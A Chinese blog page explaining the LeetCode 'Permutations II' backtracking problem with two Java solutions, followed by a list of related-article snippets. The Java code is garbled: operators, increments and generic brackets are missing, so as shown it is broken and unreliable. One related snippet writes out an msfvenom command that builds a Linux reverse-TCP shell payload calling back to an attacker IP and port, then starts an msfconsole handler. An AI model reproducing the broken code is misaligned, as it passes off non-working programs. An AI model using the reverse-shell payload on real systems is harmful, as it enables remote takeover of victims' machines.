当前位置: 首页 > article >正文

【递归算法】全排列 Ⅱ

题目链接文章摘要本文解析了LeetCode上全排列II问题要求在包含重复数字的数组中返回所有不重复的全排列。通过分析决策树指出需在标准全排列解法基础上增加剪枝策略避免重复结果。详细讲解了两种剪枝思路一种是基于合法条件数字未使用且满足特定条件进入递归另一种是基于不合法条件数字已使用或与前一个重复数字冲突跳过递归。提供了对应的Java代码实现并强调了对数组排序的重要性。最后总结了两种剪枝方法的等价性为处理重复元素的全排列问题提供了清晰解决方案。一、题目解析题目给我们一个包含重复数字的数组要我们返回所有不重复的全排列。这道题目与之前的全排列那道题目相比难了一些不单单nums数组中含有重复元素连结果也要求不重复。如果我们按照全排列那题的思路去画决策树就会发现有很多重复的结果。因此在全排列那道题目的思路的基础上我们需要进行剪枝。二、算法原理 代码实现决策树根据例子 nums [ 1, 1, 1, 2 ]画出决策树部分如下这里有必要对决策树进行分析我们要想得到不重复的结果就需要有两个限制条件相同的元素只能在每一次递归时使用一次和同一个元素在一个分支只能使用一次。比如我们这里给出的例子 nums [ 1, 1, 1, 2 ]这里就有相同元素 “1”因此在每一层递归中只可以使用一个 “1”其余的都必须剪掉。上图的红色叉叉表示剪掉相同元素绿色叉叉表示该元素已被用过。接下来我们来考虑什么情况下能够进入 dfs 函数进行递归当i 0的时候可以递归吗答案是可以的我们直接将它添加到第一个位置上然后修改状态为 true 表示这个数字已被使用后续这个分支的递归中都不得再使用该数字。这时候因为所给数组中下标为 0、1 和 2 的数字都是 “1”而我们已经使用了下标为 0 的元素 “1”因此后面的元素 “1”也不得再使用了否则会出现重复结果。接下来基于第一个位置是下标为 0 的 “1”我们递归。到达第二层后判断数字状态发现下标为 0 的 “1”已被使用了那就再判断下标为 1 的 “1”它没有被使用过于是第二个位置选择下标为 1 的 “1”。这里你可能会问前面不是说过每一层递归不能使用相同元素嘛为什么这里可以呢这里的三个 “1” 虽然说是 “相同元素”但本质还是 “不同” 的我们可以给它们标上号便于区分如 1号1、2号1 和 3号1。已被使用的是 1号1但是不影响 2号1 和 3号1 的位置选择呀注意前提是 “1号1 已被使用”~选择了下标为 1 的 “1” 之后要把下标为 2 的 “1” 剪掉然后基于这个组合再递归。接下来剩下的两个元素分别对应两个结果[ 1, 1, 1, 2 ] 和 [ 1, 1, 2, 1 ]。等到回溯到第二层的时候再递归第二个位置为元素 “2” 的情况得到结果[ 1, 2, 1, 1 ]。然后继续回溯到第一层这时候由于下标为 1 和下标为 2 的元素 “1” 都被剪掉了于是不递归它们。这里满足 “当前元素 ! 前一个元素”注意这里有个前提是数组要有序因此在此之前不要忘记对 nums 进行排序噢~因此直接递归元素 2把元素 2 放到第一个位置上基于这个分支继续递归。然后判断下标为 0 的 “1”是否被用过未被使用过就把它放到第二个位置上接着发现后面两个元素 “1”于是把它们剪掉再继续递归。最后得到结果[ 2, 1, 1, 1 ]。这样不重复的全排列结果[ [ 1, 1, 1, 2 ], [ 1, 1, 2, 1 ], [ 1, 2, 1, 1 ], [ 2, 1, 1, 1 ] ]。dfs 函数函数头我们每一次递归都需要针对 nums 中的数字进行操作因此函数头的设计与全排列一样需要将 nums 作为参数。函数体本题重复的操作是根据特定条件选择数字满足了这些条件就可以继续递归不满足则跳过当然也可以考虑 “不合法” 条件来做本题。因此是要遍历 nums然后根据条件判断结果来决定是否执行后续递归和回溯的逻辑。细节问题回溯这里涉及到的回溯操作和全排列是一样的只需要在递归回来之后恢复现场即可。剪枝本题剪枝是重点根据从分析决策树得到的条件来判断从而完成剪枝。递归出口本题的递归出口与全排列一样的当 path 中的数字个数与 nums 的长度一致就更新结果并返回。代码实现思路一只考虑 “合法” 的分支class Solution { ListListInteger ret; // 记录结果 ListInteger path; // 记录单个结果 boolean[] check; // 标记数字状态 public ListListInteger permuteUnique(int[] nums) { ret new ArrayList(); path new ArrayList(); check new boolean[nums.length]; // 对 nums 排序 Arrays.sort(nums); dfs(nums); return ret; } private void dfs(int[] nums) { if (path.size() nums.length) { ret.add(new ArrayList(path)); // 更新结果 return; } for (int i 0; i nums.length; i) { // 判断何时进入递归 if ((check[i] false) (i 0 || nums[i] ! nums[i-1] || check[i-1] true)) { path.add(nums[i]); check[i] true; dfs(nums); // 回溯时恢复现场 path.remove(path.size() - 1); check[i] false; } } } }我们不妨换个思路考虑 “不合法” 即什么时候不进入 dfs 函数那就是将 “合法” 的情况反过来。合法不合法若当前数字未被使用过就递归check[i] false若当前数字被使用过就不递归check[i] true要么第一个数字可以递归要么当前数字与前一个数字不相等可以递归要么前一个数字是被使用过的可以递归i 0 或 nums[i] ! nums[i-1] 或 check[i-1] true不是第一个数字并且当前数字与前一个数字相等并且前一个数字未被使用过时不递归i ! 0 与 nums[i] nums[i-1] 与 check[i-1] false以上两个条件必须同时满足以上两个条件满足一个即可思路二只考虑 “不合法” 的分支class Solution { ListListInteger ret; // 记录结果 ListInteger path; // 记录单个结果 boolean[] check; // 标记数字状态 public ListListInteger permuteUnique(int[] nums) { ret new ArrayList(); path new ArrayList(); check new boolean[nums.length]; // 对 nums 排序 Arrays.sort(nums); dfs(nums); return ret; } private void dfs(int[] nums) { if (path.size() nums.length) { ret.add(new ArrayList(path)); // 更新结果 return; } for (int i 0; i nums.length; i) { // 判断何时不进入递归 if ((check[i] true) || (i ! 0 nums[i] nums[i-1] check[i-1] false)) continue; path.add(nums[i]); check[i] true; dfs(nums); // 回溯时恢复现场 path.remove(path.size() - 1); check[i] false; } } }文章到这里就告一段落啦若有错误请尽管指出~完

相关文章:

【递归算法】全排列 Ⅱ

题目链接 文章摘要: 本文解析了LeetCode上"全排列II"问题,要求在包含重复数字的数组中返回所有不重复的全排列。通过分析决策树,指出需在标准全排列解法基础上增加剪枝策略,避免重复结果。详细讲解了两种剪枝思路&#…...

VOOHU 沃虎电子 千兆PoE+集成式RJ45连接器 SYT411Q199DB2A1DP 内置网络变压器 支持720mA供电 适用于PoE交换机与无线AP

苏州沃虎电子科技有限公司(品牌:VOOHU)供应的 SYT411Q199DB2A1DP 是一款高性能千兆集成式RJ45连接器,内置符合IEEE 802.3at标准的网络变压器,支持PoE(高达720mA)供电。该产品采用90侧插DIP封装&…...

终极指南:如何用 YahooFinanceApi 快速获取免费金融数据

终极指南:如何用 YahooFinanceApi 快速获取免费金融数据 【免费下载链接】YahooFinanceApi A handy Yahoo! Finance api wrapper, based on .NET Standard 2.0 项目地址: https://gitcode.com/gh_mirrors/ya/YahooFinanceApi 你是否正在寻找一个简单、免费且…...

实战级SQL注入测试技巧揭秘

目录 一、高阶注入判断技巧(不爆数据,只测漏洞) 1. 布尔盲注(Boolean-based) 2. 时间盲注(Time-based) 3. 报错注入(Error-based) 二、高阶利用手法(实战…...

在给ppt接入扣子空间(Ai)/智能体,新玩法10分钟搞定说课,公开课AI互动!

做 PPT 时,你是否遇到过这些痛点:演讲中观众突然提问,临时组织语言容易逻辑混乱;同一问题被反复询问,浪费演示时间;静态页面无法按需补充细节,信息传递不精准。而扣子空间(Coze&…...

kali制作木马

黑客必备工具:Metasploit Framework(MSF)1. 生成木马程序: > msfvenom -p linux/x64/shell/reverse_tcp LHOST攻击机ip(Kali) LPORT9999 -f elf -o shell.elf2. 启动控制程序: > msfconsole > use exploit/mu…...

C++ 无原生 JSON 支持?一文实现通用序列化与反序列化封装方案

前言 在现代软件开发中,JSON(JavaScript Object Notation)因其轻量级和易读性成为数据交换的主流格式。C虽无原生JSON支持,但通过封装第三方库(如nlohmann/json),可高效实现序列化(…...

华硕笔记本性能困境突破:G-Helper工具的全方位优化方案

华硕笔记本性能困境突破:G-Helper工具的全方位优化方案 【免费下载链接】g-helper Lightweight Armoury Crate alternative for Asus laptops. Control tool for ROG Zephyrus G14, G15, G16, M16, Flow X13, Flow X16, TUF, Strix, Scar and other models 项目地…...

30分钟零基础入门:DJI Cloud API Demo实现无人机云平台集成的完整指南

30分钟零基础入门:DJI Cloud API Demo实现无人机云平台集成的完整指南 【免费下载链接】DJI-Cloud-API-Demo 项目地址: https://gitcode.com/gh_mirrors/dj/DJI-Cloud-API-Demo DJI Cloud API Demo是一个开源项目,主要功能是帮助开发者快速实现无…...

DMG2IMG终极指南:3分钟掌握苹果DMG文件跨平台转换技巧

DMG2IMG终极指南:3分钟掌握苹果DMG文件跨平台转换技巧 【免费下载链接】dmg2img DMG2IMG allows you to convert a (compressed) Apple Disk Images (imported from http://vu1tur.eu.org/dmg2img). Note: the master branch contains imported code, but lacks bug…...

破解AutoDock Vina金属对接难题:3种专业方案实战深度解析

破解AutoDock Vina金属对接难题:3种专业方案实战深度解析 【免费下载链接】AutoDock-Vina AutoDock Vina 项目地址: https://gitcode.com/gh_mirrors/au/AutoDock-Vina AutoDock Vina作为最广泛使用的开源分子对接引擎之一,在处理含金属元素的蛋白…...

自动驾驶之心实习生招募|上海线下,一起做点真东西

点击下方卡片,关注“自动驾驶之心”公众号 戳我-> 领取自动驾驶近30个方向学习路线 自动驾驶之心是业内头部的垂类自媒体平台,过去一年,我们梳理了端到端、VLA、世界模型、强化学习等前沿方向的最新进展,也分享了行业概况、融资…...

避坑指南:SpringBoot调用DeepSeek API时你可能会遇到的5个问题及解决方案

SpringBoot集成DeepSeek API的5个典型避坑指南 在将DeepSeek的对话补全能力整合到SpringBoot应用时,不少开发者会遇到一些看似简单却容易踩坑的问题。这些问题往往不会在官方文档中被特别强调,但却能让你在调试过程中耗费数小时。本文将聚焦五个最具代表…...

别再只用交叉熵了!医疗AI中疾病分级任务,试试PyTorch实现这个序数回归损失函数

医疗AI中的序数回归:超越交叉熵的疾病分级新范式 在医疗人工智能领域,我们经常遇到需要预测疾病严重程度分级的任务——从轻度到中度再到重度,这些类别之间存在明确的递进关系。传统做法是直接套用交叉熵损失函数,但这就像用尺子测…...

S32DS隐藏技巧:用FTM定时器实现精准延时(替代低效for循环)

S32DS隐藏技巧:用FTM定时器实现精准延时(替代低效for循环) 在嵌入式开发中,延时功能几乎是每个项目都无法绕开的基础需求。从简单的LED闪烁到复杂的通信协议时序控制,精准的延时控制直接影响着系统的稳定性和响应速度。…...

Go语言依赖管理:从GOPATH到Go Modules

Go语言依赖管理:从GOPATH到Go Modules 作为一个写了十几年代码的Go后端老兵,我经历了Go语言依赖管理的从GOPATH到Go Modules的转变,踩了不少坑。今天就来分享一下Go语言依赖管理的实践经验。 一、依赖管理的演进 1. GOPATH时代 在Go 1.11之前…...

【综述型文章】人工智能驱动的生物医学多模态数据融合与分析中的挑战

论文总结1、作者总结了挑战:1)数据的挑战-meta元学习和transfering learning迁移学习;2)生物医学模型的可解释性--基于网络结构的可解释性(将通路先验信息等加入到网络结构中,约束网络学习参数)…...

从零到一:在本地CentOS环境完整部署yshop-drink扫码点餐系统的实战指南

1. 环境准备:从零搭建CentOS基础系统 第一次在本地部署yshop-drink扫码点餐系统时,我选择了CentOS 7.9作为基础环境。这个版本既稳定又兼容大多数现代软件包,特别适合作为生产环境使用。建议直接使用阿里云镜像站下载Minimal版本ISO文件&…...

家里装了 OpenClaw,在公司也能随时管理——Shield CLI 远程访问方案

家里装了 OpenClaw,在公司也能随时管理 OpenClaw 火到不用介绍了——GitHub 25 万 Star,一个能真正帮你干活的 AI Agent。很多人装在家里的 Windows 电脑上,配好了 API Key 和各种插件,用着很爽。但一到公司或者出门在外&#xff…...

# Trae IDE `settings.json` 配置详解与教学文档

Trae IDE settings.json 配置详解与教学文档 一、文档说明 本文档针对 Trae IDE 中 Java 开发核心配置文件 settings.json 进行逐字段解读,结合实际开发场景说明配置目的、作用及最佳实践,适配 Spring Boot + Maven + JDK21 技术栈。 二、配置文件整体作用 settings.json…...

Java 核心四大基石:从 Object 源码到包装类陷阱的全维度复盘

让我们从两个常见的实际场景出发,看看开发者会遇到什么困惑。 场景一:如何在程序中获取“当前时间”? 你一定见过这样的界面: 直播画面右上角显示:2026 年 01 月 08 日 15:00:00(实时更新) 这个…...

如何在3分钟内为Axure RP配置中文界面:终极汉化指南

如何在3分钟内为Axure RP配置中文界面:终极汉化指南 【免费下载链接】axure-cn Chinese language file for Axure RP. Axure RP 简体中文语言包,不定期更新。支持 Axure 9、Axure 10。 项目地址: https://gitcode.com/gh_mirrors/ax/axure-cn 你是…...

Proxmox VE虚拟化实战:如何给MikroTik RouterOS配置PCI直通网卡(ROS 6.44.2实测)

Proxmox VE虚拟化实战:MikroTik RouterOS PCI直通网卡性能优化指南 在虚拟化环境中部署网络设备时,性能损耗一直是困扰技术人员的核心问题。当我们需要在Proxmox VE上运行MikroTik RouterOS作为软路由时,传统的virtio虚拟网卡方案往往无法满足…...

3大核心功能让你轻松掌握League-Toolkit英雄联盟辅助工具

3大核心功能让你轻松掌握League-Toolkit英雄联盟辅助工具 【免费下载链接】League-Toolkit 兴趣使然的、简单易用的英雄联盟工具集。支持战绩查询、自动秒选等功能。基于 LCU API。 项目地址: https://gitcode.com/gh_mirrors/le/League-Toolkit League-Toolkit是一款基…...

SpringBoot WebSocket 客户端断线重连:从心跳检测到优雅恢复

1. WebSocket与实时通信的挑战 想象一下你正在玩一款多人在线游戏,突然网络卡顿导致角色掉线,重新登录后发现之前的战斗进度全部丢失——这种糟糕体验正是WebSocket重连机制要解决的问题。WebSocket作为HTTP的"升级版",确实解决了服…...

SecGPT-14B实操手册:Gradio界面中temperature=0.3对安全答案确定性的影响

SecGPT-14B实操手册:Gradio界面中temperature0.3对安全答案确定性的影响 1. 引言:为什么安全问答需要“确定性”? 想象一下,你正在向一位网络安全专家咨询一个紧急的安全漏洞问题。你希望得到的回答是清晰、准确、且唯一的正确答…...

从零开始学流程图:GESP C++二级考试中的三种基本结构详解

从零开始学流程图:GESP C二级考试中的三种基本结构详解 在编程学习的道路上,流程图就像是一张清晰的地图,能够帮助初学者直观地理解程序运行的逻辑路径。特别是对于准备GESP C二级考试的考生来说,掌握流程图的绘制和解读技巧&…...

ESP32 IDF环境下DHT11温湿度读取避坑指南:从时序图到数据拼接的完整解析

ESP32 IDF环境下DHT11温湿度读取避坑指南:从时序图到数据拼接的完整解析 在物联网设备开发中,温湿度传感器是最基础也最常用的环境感知元件之一。DHT11作为一款低成本、单总线数字输出的温湿度传感器,被广泛应用于各类嵌入式项目中。然而&…...

Path of Building完全指南:精准规划角色构筑3步法+高效配置策略

Path of Building完全指南:精准规划角色构筑3步法高效配置策略 【免费下载链接】PathOfBuilding Offline build planner for Path of Exile. 项目地址: https://gitcode.com/gh_mirrors/pat/PathOfBuilding Path of Building是一款强大的离线工具&#xff0c…...

Mermaid CLI:从文本到图表的自动化解决方案

Mermaid CLI:从文本到图表的自动化解决方案 【免费下载链接】mermaid-cli Command line tool for the Mermaid library 项目地址: https://gitcode.com/gh_mirrors/me/mermaid-cli 引言:技术文档中的图表困境 在软件开发过程中,技术文…...